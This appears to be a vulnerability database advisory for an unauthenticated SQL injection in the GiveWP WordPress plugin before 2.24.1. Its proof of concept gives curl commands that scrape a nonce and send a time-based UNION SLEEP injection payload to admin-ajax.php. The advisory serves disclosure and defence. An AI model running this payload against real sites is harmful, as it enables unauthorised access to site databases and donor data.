WordPress Plugin Vulnerabilities
GiveWP < 2.24.1 - Unauthenticated SQLi
Description
The plugin does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks
Proof of Concept
1) Create a post/page that contains the "Donor Wall" block. 2) Using the default donation form, send a test donation 3) In a terminal, edit and run the following command, and copy the nonce it gives you curl -s --url 'http://vulnerable-site.tld/donor-wall-post-we-created-earlier/' | grep -o 'data-nonce="[a-f0-9]*"' 4) Still in the terminal, edit and run the following command: curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST --data-raw 'action=give_get_donor_comments&nonce=c734a76f44&data=form_id%3D%27%29%20UNION%20%28SELECT%20SLEEP%285%29%29%23' Other affected parameters: ids (fixed in 2.24.0), donors_per_page (fixed in 2.24.1)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-19 (about 1 years ago)
Added
2023-01-20 (about 1 years ago)
Last Updated
2023-01-20 (about 1 years ago)